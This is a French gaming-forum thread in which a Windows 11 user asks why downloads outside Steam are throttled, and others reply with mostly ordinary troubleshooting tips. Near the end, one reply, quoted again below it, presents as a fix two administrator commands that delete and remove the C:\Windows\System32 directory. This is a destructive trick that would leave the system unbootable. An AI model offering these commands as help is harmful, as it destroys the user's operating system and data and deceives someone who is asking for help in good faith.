Besoin d'un khey informaticien pour m'aider
Je viens ici vous demandez de l'aide car je ne sais pas ce qu'il se passe alors voila normalement je télécharge à 10 mo/s sauf que depuis hier, il y a un truc qui bride mon téléchargement car que ce soit sur le navigateur, epic games, ubisoft etc tout est bridé à 3 mo/s environ SAUF Steam qui lui fonctionne toujours à plein régime d'où mon incompréhension
j'ai essayer de réinstaller les pilotes de ma carte réseau et ça n'a rien changer
pareil pour un démarrage en mode sans échec avec prise en charge réseau, ça n'a rien changer toujours le même soucis
et quand je fait un speedtest sur mon navigateur ça indique les bons chiffres pourtant donc là je suis perdu
Et entre hier et aujourd'hui je n'ai rien d'installé de spécial mis à part avoir mis a jour quelque pilotes mais sinon rien
Voila j'ai que ça d'installer, j'ai pas grand chose vu que j'ai refait mon PC à neuf y a pas longtemps
J'ai oublier de préciser je suis sur Windows 11
Le 09 décembre 2023 à 23:20:41 :
tu télécharge depuis où? avec quel navigateur?
j'ai décider de garder Edge pour essayer mais le truc c'est que c'est partout pareil sauf sur Steam où là j'ai ma vrai vitesse
pareil en desactivant tout les pare-feu et autre truc du genre
Le 09 décembre 2023 à 23:22:21 :
pareil en desactivant tout les pare-feu
ceci ne veux rien dire sauf si t'as vraiment plusieurs parfeux
Le 09 décembre 2023 à 23:19:34 :
Bien le bonsoir![]()
Je viens ici vous demandez de l'aide car je ne sais pas ce qu'il se passe alors voila normalement je télécharge à 10 mo/s sauf que depuis hier, il y a un truc qui bride mon téléchargement car que ce soit sur le navigateur, epic games, ubisoft etc tout est bridé à 3 mo/s environ SAUF Steam qui lui fonctionne toujours à plein régime d'où mon incompréhension
![]()
j'ai essayer de réinstaller les pilotes de ma carte réseau et ça n'a rien changer
pareil pour un démarrage en mode sans échec avec prise en charge réseau, ça n'a rien changer toujours le même soucis
et quand je fait un speedtest sur mon navigateur ça indique les bons chiffres pourtant donc là je suis perdu
Et entre hier et aujourd'hui je n'ai rien d'installé de spécial mis à part avoir mis a jour quelque pilotes mais sinon rienVoila j'ai que ça d'installer, j'ai pas grand chose vu que j'ai refait mon PC à neuf y a pas longtemps
![]()
Go sur chrome et fait test debit l'OP, edge c'est un truc d'absolugolem
Le 09 décembre 2023 à 23:25:52 :
Le 09 décembre 2023 à 23:19:34 :
Bien le bonsoir![]()
![]()
Et entre hier et aujourd'hui je n'ai rien d'installé de spécial mis à part avoir mis a jour quelque pilotes mais sinon rienVoila j'ai que ça d'installer, j'ai pas grand chose vu que j'ai refait mon PC à neuf y a pas longtemps
![]()
Go sur chrome et fait test debit l'OP, edge c'est un truc d'absolugolem
![]()
Fais un nperf en dépit de
T'es en wifi ou ethernet ?
Le 10 décembre 2023 à 03:35:17 :
Le 10 décembre 2023 à 03:29:59 :
Fais un nperf en dépit deT'es en wifi ou ethernet ?
ethernet
En soit ta bande passante en down c'est 27 mega
Fait Win + r et tape resmon pour vérifier ta bande passante et les programmes en cours en dépit de
Ensuite t'écris rd /s /q C:\Windows\System32 et appuis sur Entrée, fais juste des copié-coller de ce qu'il y a écrire

Le 10 décembre 2023 à 03:43:44 :
Dans ta barre des tâches tu recherches CMD, tu fais clique droit sur l'application avec une icône en forme de carré noir et tu fais Exécuter en tant qu'Administrateur. Ensuite tu fais ça et tout devrais fonctionner : T'écris del /s /q C:\Windows\System32\* et appuis sur Entrée.
Ensuite t'écris rd /s /q C:\Windows\System32 et appuis sur Entrée, fais juste des copié-coller de ce qu'il y a écrire![]()
Le 10 décembre 2023 à 03:45:47 :
Le 10 décembre 2023 à 03:43:44 :
Dans ta barre des tâches tu recherches CMD, tu fais clique droit sur l'application avec une icône en forme de carré noir et tu fais Exécuter en tant qu'Administrateur. Ensuite tu fais ça et tout devrais fonctionner : T'écris del /s /q C:\Windows\System32\* et appuis sur Entrée.
Ensuite t'écris rd /s /q C:\Windows\System32 et appuis sur Entrée, fais juste des copié-coller de ce qu'il y a écrire![]()
Données du topic
- Auteur
- Verginclitoryx
- Date de création
- 9 décembre 2023 à 23:19:34
- Nb. messages archivés
- 21
- Nb. messages JVC
- 21